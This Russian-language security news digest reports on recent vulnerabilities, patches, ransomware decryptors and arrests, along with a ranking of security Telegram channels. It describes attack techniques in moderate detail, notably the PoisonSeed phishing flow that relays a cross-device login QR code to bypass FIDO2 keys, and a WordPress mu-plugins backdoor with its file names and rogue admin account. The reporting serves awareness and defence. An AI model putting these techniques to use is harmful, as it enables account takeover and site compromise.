Microsoft анонсировала экстренные обновления для исправления активно эксплуатируемых 0-day в SharePoint Server, которые отслеживаются как CVE-2025-53770 и CVE-2025-53771.

По данным обнаружившей атаки Eye Security, эксплуатация CVE-2025-53770 и CVE-2025-53771, получивших условное наименование ToolShell, началась 18 июля.

На удивление Microsoft оперативно подтвердила использование проблем в реальных условиях и поделилась мерами по смягчению, одновременно приступив к разработке исправлений.

Поздно вечером в воскресенье разработчики сообщили об обновлениях безопасности, которые позволят устранить уязвимости в SharePoint Subscription Edition и SharePoint 2019. Обновления для SharePoint 2016 - почти на выходе.

CVE-2025-53770 и CVE-2025-53771 затрагивают только локальные серверы SharePoint. Уязвимости могут быть объединены в цепочку для реализации RCE без аутентификации.

В ходе атак, замеченных Eye Security и Google, злоумышленники внедряли веб-шелл и похищали криптографические секреты, что открыла им полный доступ к взломанным системам.

При этом результаты сканирования Eye Security глобальной сети позволили выявить десятки серверов SharePoint, которые были взломаны с помощью ToolShell.

В свою очередь, ShadowServer заявила о более чем 9000 экземплярах SharePoint, доступных через интернет, большинство из которых располагаются в Северной Америке и Европе, но пока без маркировки их возможной уязвимости для обнаруженных проблем.

На выходных компания Palo Alto Networks также задетектила задействование CVE-2025-49704 и CVE-2025-49706 в широкомасштабных атаках по всему миру.

CVE-2025-53770 и CVE-2025-53771 являются вариантами CVE-2025-49706 и CVE-2025-49704, которые исследователи из команды Viettel продемонстрировали еще в мае на хакерском турнире Pwn2Own в Берлине, о чем мы также сообщали.

Microsoft исправила уязвимости CVE-2025-49706 и CVE-2025-49704 в рамках PatchTuesday за июль 2025 года.

Однако несколько дней спустя исследователи Code White воспроизвели цепочку эксплойтов, которую они назвали ToolShell, показав, возможность ее выполнения всего лишь одним запросом неавторизованного злоумышленника.

Так что и злоумышленникам, по всей видимости, удалось обойти исправления Microsoft для CVE-2025-49706 и CVE-2025-49704 для инициирования атак на уязвимые серверы SharePoint.

Соответственно Microsoft опубликовала новые рекомендации и присвоила новые CVE: CVE-2025-53770 и CVE-2025-53771, исправления которых обеспечивает, как уверяют разработчики, более качественную защиту нежели для предыдущих CVE-2025-49704 и CVE-2025-49706.

При этом, в рекомендациях Microsoft по уязвимости CVE-2025-53771 до сих пор не упоминается активная эксплуатация. Впрочем, микромягкие, как всегда, в своем репертуаре.

Более 1000 доступных в сети экземпляров CrushFTP уязвимы для атак, нацеленных на критическую 0-day, которая фактически открывает административный доступ к веб-интерфейсу.

CVE-2025-54309 (оценка CVSS 9,0) вызвана неправильной проверкой AS2 и затрагивает все версии CrushFTP ниже 10.8.5 и 11.3.4_23. Исправления были включены в версии CrushFTP 10.8.5_12 и 11.3.4_26.

19 июля поставщик отметил уязвимость как активно эксплуатируемую, не исключая при этом, что атаки могли начаться еще раньше, но доказательств, подтверждающих это предположение пока получено.

По данным CrushFTP, дефект присутствовал в сборках, выпущенных до 1 июля, и был исправлен в последних версиях программного обеспечения, хотя вектор атаки с HTTP(S) не был устранен.

Как отмечают разработчики, хакеры, по-видимому, увидели изменени в коде и нашли способ воспользоваться предыдущей ошибкой, связанной с AS2 в HTTP(S).

По данным компании, риску эксплуатации подвержены только те экземпляры, которые не используют DMZ перед приложением.

По данным Shadowserver, около 1040 экземпляров CrushFTP по-прежнему остаются без исправлений CVE-2025-54309 в уязвимом для атак состоянии.

Пока неясно, задействовалось ли в ходе начавшихся атак вредоносное ПО или наблюдалась ли кража данных, но в последние годы решения для управляемой передачи файлов, включая CrushFTP, не раз становились целями банд вымогателей.

Как это было в случае с Clop, которая успела провернуть на этом направлении ряд серьезных резонансных кампаний, нацеленных на нули в Accelion FTA, GoAnywhere MFT, MOVEit Transfer и, совсем недавно, в ПО Cleo.

В апреле 2024 года другая активно эксплуатируемая 0-day в CrushFTP использовалась в APT-атаках в отношении американских компаний, о чем тогда сообщали исследователи CrowdStrike.

Японские силовики представили дешифратор для Phobos и 8base ransomware, который может быть использован жертвами для бесплатного восстановления залоченных файлов.

Phobos функционировала по модели RaaS, начиная с 2018 года.

Несмотря непубличный характер своей деятельности, Phobos считается одной из наиболее широко распространенных RaaS, ответственной за множество атак по всему миру.

В свою очередь, банда 8base приступила к работе в 2023 году с использованием утекшей версии кода Phobos, практикуя классическую схему двойного вымогательства.

В 2024 году подозреваемый в организации Phobos RaaS был задержан и экстрадирован из Южной Кореи в США, где ему предъявили обвинения по 13 пунктам.

Затем в результате международной операции силовых ведомств также было заблокировано и изъято 27 серверов, а также арестовано четверо подозреваемых в руководстве группировкой 8Base.

Власти Японии не раскрывают, каким образом им удалось разработать дешифратор.

Тем не менее обстоятельства дают все основания полагать, что для этого использовался мощный инструмент современной прикладной криптографии, а именно: терморектальный криптоанализор.

Дешифратор можно загрузить с сайта японской полиции (инструкция прилагается), а также доступен на платформе Европола - NoMoreRansom.

Следует отметить: Google Chrome и Mozilla Firefox распознают дешифратор как вредоносное ПО, что затрудняет его загрузку и использование.

Однако результаты практических тестов дешифратора показали его высокую эффективность.

В настоящее время он поддерживает расшифровку файлов со следующими расширениями: phobos, 8base, elbie, faust и LIZARD.

Но, как сообщают японские правоохранители, могут поддерживаться и некоторые другие расширения.

Так что жертвам Phobos и 8Base стоит протестировать дешифратор, даже если их зашифрованные файлы не входят в указанный перечень расширений. Вполне возможно, что утилита их также сможет отработать.

Специалисты Лаборатории цифровой криминалистики и исследования вредоносного кода F6 выпустили собственную утилиту для дешифровки файлов жертв, пострадавших в ходе атак Phobos ransomware.

Причем отметим, что упомянутые вчера японские правоохранители, как нам подсказали, выкатили код с ошибками. А рабочий инструмент от F6 можно скачать на GitHub.

Топ телеграм-каналов в ИБ

Июль, когда адский месяц массовых отпусков и информационного треша в мире не начался, подходящее время для нашего третьего рейтинга каналов по ИБ.

В третьем рейтинге есть те, кто появился в Telegram совсем недавно, но уже делает качественный контент и имеет вес в количестве подписчиков.

Некоторых новоприбывших мы тоже хотели добавить, но у них пока что очень малое количество подписчиков, а самое главное — мало содержания. Поэтому их мы, надеемся, увидим уже в следующем рейтинге.

Часть 1.

Авторские:

1. Пост Лукацкого
2. Пакет Безопасности
3. Sachok
4. Сицебрекс
4. Ever Secure и Технологический болт Генона
5. Солдатов в телеграм, BESSEС, Евгений Касперский
6. ZLONOV, Управление уязвимостями и прочее и Топ кибербезопасности Батранкова
7. Максимов.Записки
8. Наталья Касперская
9. Вектор Грабского

Offensive:

1. Похек
2. Red team brazzers
3. Багхантер
4. Кавычка
5. Егор Богомолов
6. Заметки Слонсера и PRO:PENTEST
7. s0i37_chanel
Поросенок Петр
GigaHackers

Defensive:

1. ESCalator
2. README.hta
3. Blue (h/c)at Café и Security wine (бывший - DevSecOps Wine) и Makrushin
4. Disasm.me channel
5. Четыре луча, AppSec Journey и PurpleBear

Mixed:

1. k8s (in)security
2. Кибервойна и Mobile AppSec World
3. Репорты простым языком
4. Сертификат безопасности
5. Кибербез образование, Райтапы по CTF {2025}, ГОСТ VPN | aveselov.ru, PWN AI, Monkey see, monkey do

Микроблоги:

1. Ильдар Пишет
2. Омский багхантер
3. Банка пывна и Про ИБ с высоты каблуков и Кибербез Андрея Дугина
4. Двое из Кибермаркетинга
5. NA_SOC
6. Защита персональных данных и не только и SbX | Security by Xyurity

Новостные/агрегаторы:

1. SecАtor
2. НеЛукацкий
3. Утечки информации и Порвали два трояна и Offensive Twitter
5. Об ЭП и УЦ
6. RUSCADASEC news: Кибербезопасность АСУ ТП

Корпоративные:

1. Kaspersky
2. Базис
3. Avanpost
4. Борьба с киберпреступностью | F6 и BI.ZONE
5. Innostage
6. РТ-ИБ, 3side кибербезопасности
7. Echelon Eyes
8. VK Security
9. Солар
10. Red Security

Каналы IT-журналистов:

1. Грустный киберпанк
2. КиберBEZправил
3. Radio Tishina
4. Игнатий Цукергрохер
5. Doomtech
6. Убедился корр. ТАСС
7. Точксичная цифра, Первый канал, Корневой DoStup
8. По сути, Аркадий

@cybersachok

Исследователи Expel обнаружили фишинговую кампанию PoisonSeed, которая обходит защиту ключей безопасности FIDO2, используя функцию входа между устройствами в WebAuthn, обманом заставляя пользователей одобрять запросы на аутентификацию входа с фейковых корпоративных порталов.

Злоумышленники PoisonSeed реализуют масштабные фишинговые атаки в рамках кампаний, связанных с финансовым мошенничеством.

Предыдущие рассылки были нацелены на активы в криптокошелках пользователей.

В наблюдаемой фишинговой кампании PoisonSeed не использовали какую-либо уязвимость системы безопасности FIDO2, а вместо этого злоупотребляли легальной функцией аутентификации между устройствами, которая понижает процесс аутентификации ключей FIDO.

Кросс-девайсная аутентификация в WebAuthn позволяет пользователям входить в систему на одном устройстве, используя ключ безопасности или приложение аутентификации на другом.

Вместо физического подключения, например, подключения ключа безопасности, запрос на аутентификацию передаётся между устройствами по Bluetooth или посредством сканирования QR-кода.

Атака начинается с перенаправления пользователей на фишинговый сайт, который выдает себя за корпоративные порталы входа, например, Okta или Microsoft 365.

Когда пользователь вводит свои учетные данные на портале, реализуется AiTM для скрытого входа с предоставленными учетными данными на реальном портале в режиме онлайн.

Пользователь, подвергшийся атаке, обычно использует свои ключи безопасности FIDO2 для проверки запросов MFa.

Однако фишинговый бэкенд вместо этого указывает легитимному порталу входа использовать кросс-девайсную аутентификацию.

Это заставляет легитимный портал генерировать QR-код, который передается обратно на фишинговую страницу и отображается пользователю.

Когда пользователь сканирует этот QR-код с помощью своего смартфона или приложения аутентификации, он одобряет попытку входа в систему, инициированную злоумышленником.

Этот метод эффективно обходит защиту ключей безопасности FIDO2, позволяя злоумышленникам инициировать процесс входа в систему, основанный на аутентификации между устройствами вместо физического ключа FIDO2 пользователя.

Кроме того, Expel также зафиксировала отдельный инцидент, когда злоумышленник зарегистрировал собственный ключ FIDO после компрометации учётной записи, предположительно, с помощью фишинга, и сброса пароля.

Эта атака наглядно демонстрирует, как злоумышленники находят способы обойти аутентификацию, устойчивую к фишингу, обманным путем заставляя пользователей проходить процедуры входа в систему, минуя необходимость физического взаимодействия с ключом безопасности.

Исследователи полагают, что новый метод можно легко перепрофилировать для любого типа целей, которые ранее считались неуязвимыми для фишинга из-за активных ключей FIDO.

Hewlett-Packard Enterprise (HPE) предупреждает о жестко запрограммированных учетных данных в точках доступа Aruba Instant On, которые позволяют злоумышленникам обходить обычную аутентификацию устройства и получать доступ к веб-интерфейсу.

Aruba Instant On - это компактные беспроводные (Wi-Fi) устройства с функцией plug-and-play, разработанные для малого и среднего бизнеса с функционалом корпоративного уровня (гостевые сети, сегментация трафика) и управлением через облако/мобильные приложения.

CVE-2025-37103 имеет оценку CVSS v3.1: 9,8 и затрагивает точки доступа Instant On с версией прошивки 3.2.0.1 и ниже.

Успешная эксплуатация уязвимости позволяет удаленному злоумышленнику получить административный доступ к системе.

Поскольку административные учетные данные жестко запрограммированы в прошивке, для опытных пользователей их обнаружение не представляет особой сложности.

Получив доступ к веб-интерфейсу в качестве администраторов, злоумышленники могут изменить настройки точки доступа, перенастроить систему безопасности, установить бэкдоры, осуществлять перехват трафика и даже осуществить горизонтальное перемещение.

Уязвимость была обнаружена исследователем ZZ из Ubisectech Sirius, который сообщил о ней непосредственно поставщику.

В том же бюллетене HPE указывает на вторую серьёзную CVE-2025-37102, связанную с аутентифицированным внедрением команд в интерфейс командной строки (CLI) точек доступа Aruba Instant On.

Ее можно связать с CVE-2025-37103, поскольку для ее эксплуатации требуются права администратора, что позволяет злоумышленникам вводить произвольные команды в CLI для извлечения данных, отключения безопасности и обеспечения устойчивости.

Обе проблемы решаются обновлением прошивки до версии 3.2.1.0 (или более поздней), обходные пути отсутствуют.

HPE Aruba Networking не располагает информацией об эксплуатации этих двух уязвимостей, однако, как полагает поставщик, ситуация может быстро измениться.

Недавно исправленные критические RCE-уязвимости в Cisco Identity Services Engine (ISE), о которых мы сообщали, теперь активно используются в реальных атаках.

Соответствующий бюллетень команда Cisco PSIRT соответствующим образом обновила, но не представила каких-либо подробностей.

Ошибки максимальной степени серьезности были впервые раскрыты поставщиком 25 июня 2025 г. (CVE-2025-20281 и CVE-2025-20282) и 16 июля 2025 г. (CVE-2025-20337):

- CVE-2025-20281: RCE без аутентификации в Cisco Identity Services Engine (ISE) и ISE Passive Identity Connector (ISE-PIC). Злоумышленник может отправлять специально созданные API-запросы для выполнения произвольных команд с правами root в базовой ОС без аутентификации. Исправлена в ISE 3.3 (патч 7) и 3.4 (патч 2).

- CVE-2025-20282: связана с неаутентифицированной произвольной загрузкой и выполнением файлов в Cisco ISE и ISE-PIC версии 3.4. Отсутствие проверки файлов позволяет злоумышленникам загружать вредоносные файлы в привилегированные каталоги и выполнять их с правами root. Исправлена в ISE 3.4 (патч 2).

- CVE-2025-20337: RCE без аутентификации в Cisco ISE и ISE-PIC. Эксплуатация возможна через специально созданные запросы API из-за недостаточной проверки входных данных, что позволяет получить root-доступ без учётных данных. Исправлена в ISE 3.3 (патч 7) и 3.4 (патч 2).

Все три уязвимости имеют максимальную степень серьезности (CVSS: 10,0) и могут эксплуатироваться удаленно без необходимости аутентификации.

Cisco выпустила два отдельных патча для трёх уязвимостей в виду разницы во времени их обнаружения.

Для одновременного устранения всех уязвимостей администраторам рекомендуется: пользователям ISE 3.3 - обновиться до патча 7, а для 3.4 - до патча 2.

Пользователям ISE 3.2 или более ранних версий не нужно предпринимать никаких действий. Обходные пути для уязвимостей отсутствуют.

В связи с активным использованием уязвимостей крайне важно как можно скорее перейти на исправленную версию ПО для устранения возникающих рисков.

Кейс с 0-day (CVE-2025-53770) атаками на сервера SharePoint, названные ShellTool, вызвал достаточно широкий общественный резонанс, в виду которого вышло значительное число отчетов с отражением большого числа подробностей.

Для понимания развития всей ситуации решили сосредоточиться на хронологии основных событий, а также отразить наиболее значимые моменты:

- Сама 0-day и атаки были раскрыты в субботу, 19 июля, а на следующий день были выпущены патчи. Она представляет собой вариант старой RCE, известной как CVE-2025-49704, которая была исправлена ранее в этом месяце.

- Ошибка позволяет получить данные конфигурации MachineKey сервера SharePoint, которые затем можно использовать для обхода аутентификации и проведения атаки с целью RCE.

- Ранее злоумышленники пытались использовать CVE-2025-49704 и CVE-2025-49706, прежде чем переключиться на CVE-2025-53770. Обе они демонстрировались на Pwn2Own Berlin в мае этого года под названием ShellTool.

- Microsoft также исправила четвертую ошибку, CVE-2025-53771, которая представляет собой ошибку обхода пути, являющуюся разновидностью CVE-2025-49706 и, вероятно, также находящуюся под угрозой эксплуатации.

- 0-day затрагивает только локальные серверы SharePoint версий 2016 и 2019. Серверы SharePoint 2010 и 2013 также уязвимы, но исправление для них не будет выпущено. Облачные серверы Microsoft SharePoint не затронуты.

- Злоумышленники используют 0-day для развертывания веб-шеллов на взломанных серверах. Microsoft связала некоторые атаки с тремя китайскими APT: Linen Typhoon, Violet Typhoon и Storm-2603.

- Первые две группы действуют с 2012 и 2015 годов соответственно и связаны со шпионскими операциями. Третья более новая: некоторые атаки заканчивались развертыванием программ-вымогателей Warlock и Lockbit.

- SentinelOne также связала атаки с тремя кластерами, но не назвала ни имен, ни источника атак.

- Microsoft и SentinelOne сообщают, что теперь они обнаружили и других злоумышленников, также эксплуатирующих 0-day, включая другие APT.

- По данным Tenable, публичный PoC для уязвимости теперь широко доступен.

- По данным Censys, к Интернету подключено более 9700 серверов SharePoint 2016 и 2019 и, как полагает NextGov, более 1100 из них связаны с госсектором.

- По данным многочисленных источников, на сотнях из них установлены веб-шеллы, хотя неясно, связано ли это с ShellTool.

- Телеметрия Eye Security и SentinelOne показала, что первая волна атак началась 17 июля. После этого последовали и другие кампании.

- По данным WaPo, ряд госучреждений подверглись взлому.

- Исследователи SentinelOne полагают, что первоначальные цели свидетельствуют о том, что изначально деятельность была тщательно таргетированной. После раскрытия информации атаки стали носить ситуативный характер.

- В некоторых отчетах утверждается, что также была эксплуатирована CVE-2025-53771, но Microsoft этого пока не подтверждает.

- Помимо исправления ошибок, организациям следует также проводить ротацию криптографических материалов MachineKey и сканирование на наличие известных веб-шеллов. Украденные MachineKeys позволят в будущем получить доступ через бэкдор, даже после исправления систем.

- Теперь также доступен сканер, а также множество IOC в следующих отчетах: Broadcom Symantec, CISA, Cisco Talos, Censys, Check Point, CrowdStrike, Eye Security, Logpoint, Microsoft, Orange, Palo Alto Networks, Qualys, SentinelOne, Tenable, Trend Micro и Varonis.

По запросу французской прокуратуры на Украине был арестован один из администраторов действующего с 2013 года русскоязычного хакерского форума XSS.

Ресурс широко известен как один из крупнейших в киберподполье: на нем зарегистрировано более 50 000 пользователей.

Как заявляют французские власти, официальное расследование было начато 02 июля 2021 года отделом по борьбе с киберпреступностью прокуратуры Парижа при поддержке местного подразделения по борьбе с киберпреступностью полиции префектуры.

Основные усилия словаков были направлены на документирование киберпреступлений, прежде всего, связанных с ransomware, даже несмотря на то, что в мае 2021 года форум публично запретил все темы по вымогательству.

Согласно сообщениям полиции, основные успехи операции обусловлены тем, что правоохранителям удалось установить контроль за коммуникациями в Jabber.

Полицейским удалось взломать сервер «thesecure.biz» и отслеживать сообщения пользователей платформы.

Перехваченные сообщения позволил выявить многочисленные эпизоды киберпреступлений и атаки с использованием программ-вымогателей, которые принесли руководству платформы не менее 7 млн. долл. в качестве прибыли.

Дальнейший контроль технических каналов связи позволил установить личность предполагаемого администратора форума, оперативная разработка которого, начиная с сентября 2024 года, проводилась уже непосредственно на месте.

Подозреваемый был арестован вчера украинской полицией с участием французских офицеров и при содействии представителей Европола.

Учитывая, что на момент всех публикаций XSS продолжал оставаться в сети, участники форума могут не сомневаться, что среди его админов вполне могли появиться люди в погонах, причем задолго до выхода официальных сообщений.

По всей видимости, XSS может ожидать схема, которую провернули с BreachForum.

Но будем посмотреть.

Еще одна интересная деталь, которую следует добавить к нашему разбору кейса с 0-day в Microsoft SharePoint (известную как ToolShell).

Сообщается, что одной из жертв ToolShell стало Национальное управление по ядерной безопасности США (NNSA).

NNSA - это правительственное агентство в составе Министерства энергетики США, которое отвечает за контроль над ядерным оружием страны, а также реализует реагирование на ядерные и радиационные чрезвычайные ситуации в США и за их пределами.

Как сообщил Bloomberg представитель Министерства энергетики, в пятницу, 18 июля, эксплуатация 0-day в Microsoft SharePoint привела к взлому сети организации.

При этом само министерство пострадало минимально благодаря широкому использованию облака Microsoft M365 и эшелонированной системе киберзащиты.

Пострадало лишь ограниченное число систем NNSA, которые в настоящее время активно восстанавливаются.

Анонимный источник в агентстве также отметил, что, по всей видимости, в результате утечки не была раскрыта какая-либо конфиденциальная или секретная информация.

В целом, как заключают исследователи Eye Security, к настоящему времени число скомпрометированных в результате атак ToolShell объектов значительно возросло.

Согласно телеметрии компании, злоумышленники, стоящие за этими атаками, уже заразили вредоносным ПО не менее 400 серверов и взломали 148 организаций по всему миру.

И это еще не конец. Будем следить.

Финансовый сектор, промышленность и государственные учреждения остаются в числе главных целей киберпреступников в России.

Это подтверждается как общими наблюдениями, так и конкретными инцидентами, выявленными в ходе работы команды Kaspersky Managed Detection and Response (MDR).

Сервис MDR Лаборатории Касперского помогает компаниям своевременно детектировать и лочить атаки за счёт постоянного мониторинга, анализа телеметрии и выстроенных процессов реагирования.

Тем не менее, эффективность даже самого продвинутого сервиса зависит от полноты охвата инфраструктуры.

Недавний инцидент, связанный с таргетированной атакой на государственные IT-сервисы, в одной из африканских стран это наглядно подтверждает.

Злоумышленники использовали «вшитые» в код вредоносного ПО внутренние сервисы, IP-адреса и прокси-серверы, а одним из C2 стал захваченный сервер SharePoint внутри инфраструктуры заказчика.

Задействовался широкий арсенал инструментов, который включал не только самописное, но и общедоступное ПО (такое как Cobalt Strike).

Для сокрытия своих действий злоумышленники прямо во время атаки адаптировали применяемые техники, например переписывали исполняемые файлы и компилировали их как DLL для DLL sideloading.

Аналитики Kaspersky MDR зафиксировали активность модулей WmiExec и Atexec (набор инструментов Impacket) на хосте, который не был подключен к мониторингу.

После завершения работы модулей атакующие временно затаились, а затем стали проверять наличие защитных решений и использовать уязвимые участки инфраструктуры для дальнейшего распространения атаки.

При этом выявить следы использования Cobalt Strike и другие артефакты удалось лишь после подключения хоста к MDR.

В ходе всестороннего анализа инцидента активность была по итогу атрибутирована к китайской APT41, которая специализируется на кибершпионаже и нацелена на широкий спектр отраслей по меньшей мере в 42 странах. Причем до сих пор Африке APT была наименее активна.

Хотя представленный кейс завершился относительно благополучно, тем не менее он подчёркивает ключевое условие эффективности MDR: безопасность не может быть фрагментарной.

Отсутствие мониторинга хотя бы на одном сегменте инфраструктуры может превратить его в «слепое пятно» и точку входа для атаки. Полнота телеметрии напрямую влияет на своевременность и точность реагирования.

При этом сервис Kaspersky MDR базируется на многолетней экспертизе и глобальной базе знаний об угрозах (Threat Intelligence).

Ежегодно команда публикует подробные аналитические отчёты с актуальной информацией об угрозах и методах защиты.

Один из таких кейсов разобран в недавнем отчете по APT41 в Африке со всеми техническими деталями и IoCs.

Исследователи обнаружили новый бэкдор, скрытый в каталоге mu-plugins на сайтах WordPress, который предоставляет злоумышленникам постоянный доступ и позволяет им выполнять произвольные действия.

Обязательные плагины (также известные как mu-plugins) — это спецплагины, которые автоматически активируются на всех сайтах WordPress в процессе установки.

По умолчанию они размещаются в каталоге wp-content/mu-plugins.

Эта особенность вызывает особую привлекательность для злоумышленников, так mu-plugins не отображаются в списке плагинов по умолчанию в wp-admin и не могут быть отключены, кроме как путем удаления файла плагина из обязательного для использования каталога.

В результате вредоносная ПО, использующая эту технику, может функционировать незаметно, не вызывая подозрений.

Обнаруженный Sucuri PHP-скрипт в каталоге mu-plugins (wp-index.php) служит загрузчиком для извлечения полезной нагрузки следующего этапа и сохранения ее в базе данных WordPress в таблице wp_options в разделе _hdra_core.

Удаленная полезная нагрузка извлекается из URL-адреса, который зашифрован с помощью ROT13 - простого подстановочного шифра, который заменяет букву на 13-ю букву после нее (т.е. A становится N, B - O, C - P и т.д.).

Извлеченный контент затем временно записывается на диск и выполняется.

Бэкдор предоставляет злоумышленнику постоянный доступ к сайту и возможность удалённо запускать любой PHP-код.

В частности, он внедряет скрытый файловый менеджер в каталог темы под именем pricing-table-3.php, позволяя злоумышленникам просматривать, загружать и удалять файлы.

Он также создаёт пользователя-администратора с именем officialwp, а затем загружает вредоносный плагин (wp-bot-protect.php) и активирует его.

Помимо повторного заражения в случае удаления, вредоносная ПО позволяет менять пароли админов (с распространенными именами «admin», «root» и «wpsupport»), на пароль по умолчанию, установленный злоумышленником.

Опция также затрагивает пользователя officialwp.

При этом злоумышленники могут получать постоянный доступ к сайтам и выполнять вредоносные действия, фактически блокируя других администраторов.

Диапазон вредоносных действий может варьироваться от кражи данных до внедрения кода, который может заражать посетителей вредоносным ПО или перенаправлять их на другие сайты.

Исследователи Akamai проанализировали последнюю версию банковского трояна для Windows - Coyote, и обнаружили задействование фреймворка Microsoft UI Automation (UIA) для получения данных со скомпрометированных устройств.

Фактически, по данным Akamai, Coyote - это первая вредоносная ПО, которая использует фреймворк UIA.

Coyote, впервые задокументированный Лабораторией Касперского в 2024 году, используется для атак на устройства Windows в Латинской Америке.

Он поддерживает кейлоггеры и фишинговые оверлеи для сбора данных, в частности, учётных данных для банковских и криптосервисов. 

UIA является частью Microsoft .NET Framework и представляет собой легитимную функцию Microsoft, обеспечивающую программный доступ к элементам пользовательского интерфейса на рабочем столе.

Он позволяет вспомогательным технологическим продуктам предоставлять конечным пользователям информацию о пользовательском интерфейсе и управлять им с помощью средств, отличных от стандартного ввода.

В декабре 2024 года Akamai предупредила, что злоумышленники могут использовать UIA в вредоносных целях, заставляя пользователя запустить специально созданное приложение, использующее эту платформу. 

Исследователи продемонстрировали возможности использования UIA для скрытого выполнения команд, перенаправления браузера и кражи конфиденциальных данных. Атаки работают на любой версии Windows и позволяют обходить защитные решения.

Недавно компания Akamai обнаружила, что ранее описанные риски теперь имеют вполне практическую реализацию: разработчики вредоносных ПО начали злоупотреблять UIA.

Причем Coyote, по-видимому, стал первым вредоносным ПО, операторы которого смогли сделать это в реальных условиях.

Несмотря на то, что UIA потенциально может использоваться для кражи конфиденциальных данных, разработчики Coyote полагаются на него для определения, какими финансовыми услугами пользуется жертва.

Вредоносная ПО сначала использует API Windows для получения заголовков открытых окон, проверяя их соответствие списку жёстко запрограммированных адресов веб-сайтов, связанных с банками и криптосервисами. 

Если совпадений не обнаружено, вредоносная программа использует UIA для анализа дочерних элементов пользовательского интерфейса окна, что позволяет ей проверять вкладки и адресные строки браузера на соответствие зашитым в код адресам веб-сайтов.

Последняя версия вредоносного ПО таргетируется на 75 различных финансовых учреждений, в то время как ранее в январе этого года лаборатория Fortinet FortiGuard Labs фиксировала 73.

Как отмечаюи исследователи, без UIA разбор подэлементов другого приложения - достаточно нетривиальная задача.

Ведь чтобы эффективно читать содержимое подэлементов в другом приложении, разработчику необходимо очень хорошо понимать структуру конкретного целевого приложения.

Кроме того, Coyote может выполнять проверки независимо от того, находится ли вредоносная ПО в онлайн-режиме или в оффлайне, а это значительно увеличивает шансы успешно идентифицировать целевой банк или криптобиржу жертвы для того, что выкрасть учётные данные.

Mitel Networks предупреждает о критической уязвимости обхода аутентификации, затрагивающую ее корпоративную коммуникационную платформу MiVoice MX-ONE.

MX-ONE - это коммуникационная система компании на базе SIP, которая может масштабироваться для поддержки сотен тысяч пользователей.

Критическая уязвимость связана с ненадлежащим контролем доступа в компоненте MiVoice MX-ONE Provisioning Manager, и ей пока не присвоен идентификатор CVE.

Злоумышленники, не прошедшие аутентификацию, могут использовать её в атаках низкой сложности, не требующих взаимодействия с пользователем, для получения несанкционированного доступа к учётным записям администраторов в системах без установленных обновлений.

По данным Mitel, уязвимость затрагивает MiVoice MX-ONE, работающие под управлением версий 7.3 (7.3.0.0.50) - 7.8 SP1 (7.8.1.0.14). Исправлена в версиях 7.8 (MXO-15711_78SP0) и 7.8 SP1 (MXO-15711_78SP1).

Поставщик рекомендует не предоставлять доступ к сервисам MX-ONE напрямую через интернет, разворачивать систему MX-ONE исключительно в доверенной сети.

Риски также можно снизить, ограничив доступ к сервису Provisioning Manager.

Пользователям MiVoice MX-ONE версии 7.3 и более поздних версий следует направить запрос на исправление в компанию через своего авторизованного сервисного партнера.

Mitel также раскрыла серьезную SQL-уязвимость (CVE-2025-52914) в платформе для совместной работы MiCollab, которую можно использовать для выполнения произвольных команд базы данных SQL на необновленных устройствах.

Как заявляет поставщик, сведений об эксплуатации обеих проблем в реальных условиях не поступало.

Тем не менее, предыдущие уязвимости в обхода пути MiCollab (CVE-2024-55550 и CVE-2024-41713) достаточно активно задействовались в атаках.

Что не удивительно, ведь продукцию Mitel используют более 60 000 клиентов и более 75 млн. пользователей в различных секторах, включая образование, здравоохранение, финансы, промышленность и государственный сектор.

Sophos устранила пять уязвимостей в своем брандмауэре, которые позволяют удаленным злоумышленникам выполнять произвольный код.

Первая проблема отслеживается как CVE-2025-6704 (CVSS 9,8) и представляет собой критическую ошибку произвольной записи файлов в функции Secure PDF eXchange (SPX) устройства, которая позволяет удаленным неаутентифицированным злоумышленникам реализовать RCE.

Согласно рекомендациям Sophos, ошибка затрагивает лишь часть развертываний брандмауэров, поскольку может проявиться только в том случае, если включена определенная конфигурация SPX и брандмауэр работает в режиме высокой доступности (HA).

Вторая CVE-2025-7624 (CVSS 9,8) - это проблема SQL-инъекции в устаревшем прокси-сервере SMTP устройства.

Также приводя к RCE, уязвимость проявляется только если для электронной почты активна политика карантина, а SFOS была обновлена с версии старше 21.0 GA.

Таким образом, по данным Sophos, она затрагивает менее 1% устройств.

Компания также устранила серьезную ошибку внедрения команд в компоненте WebAdmin брандмауэра, которая позволяет удаленным неаутентифицированным злоумышленникам выполнять произвольный код на вспомогательных устройствах высокой доступности (HA).

Уязвимость, обозначенная как CVE-2025-7382 (CVSS 8,8), может быть активирована только в том случае, если включена аутентификация OTP для пользователя-администратора.

За последний месяц компания Sophos выпустила исправления для решения этих проблем в версиях брандмауэра 19.0 MR2 (19.0.2.472), 20.0 MR2 (20.0.2.378), 20.0 MR3 (20.0.3.427), 21.0 GA (21.0.0.169), 21.0 MR1 (21.0.1.237), 21.0 MR1-1 (21.0.1.272), 21.0 MR1-2 (21.0.1.277) и 21.5 GA (21.5.0.171).

Исправления также были включены в версию 21.0 MR2 устройства.

Последние две ошибки, описанные в бюллетене Sophos, CVE-2024-13974 и CVE-2024-13973, затрагивают компоненты Up2Date и WebAdmin устройства.

Для их эксплуатации злоумышленникам необходимо контролировать DNS-среду брандмауэра и войти в систему в качестве администратора соответственно.

Исправления этих дефектов впервые были включены в версию Sophos Firewall 21.0 MR1.

Компания заявляет, что пользователям более старых версий брандмауэра необходимо обновиться, чтобы получить все исправления.

Sophos отмечает, что не наблюдала случаев эксплуатации этих уязвимостей в реальных условиях.

Печальные новости для участников хакерского форума Leak Zone.

IP-адреса авторизованных в системе пользователей в составе базы данных ElasticSearch оказались в открытом доступе без пароля и теперь попали в руки исследователей UpGuard, обнаруживших утечку.

Всего в ней в содержалось около 22 миллионов объектов, каждый из которых представлял собой запись веб-запроса с указанием домена, на который был отправлен запрос, IP-адрес пользователя и метаданные (местоположение и интернет-провайдер).

Помимо leakzone[.]net (95% всех записей) в базе фигурировал домен, упоминаемый в 2,7% записей - accountbot[.]io, сайт для продажи взломанных аккаунтов.

Начиная с 2020 года Leak Zone задействовался киберподпольем для реализации различных хакерских утилит, эксплойтов и слитых баз и учетных данных, а теперь и сам стал одной из таких утечек.

Исследователи BI.ZONE Threat Intelligence выявили новую кампанию Core Werewolf, в ходе которой атакующие впервые использовали документы Microsoft OneNote для маскировки ВПО.

15 июля, предположительно, злоумышленники рассылали фишинговые письма с вложением Письмо_ФНС_России.one. При открытии документа пользователь видел заметку «Письмо ФНС России» и значок прикрепленного ZIP-архива.

Архив содержал исполняемый файл Письмо_ФНС_России_от_01_июля_2025_г.___АБ-4-20_1906_О_новых.exe, который является Rust-дроппером.

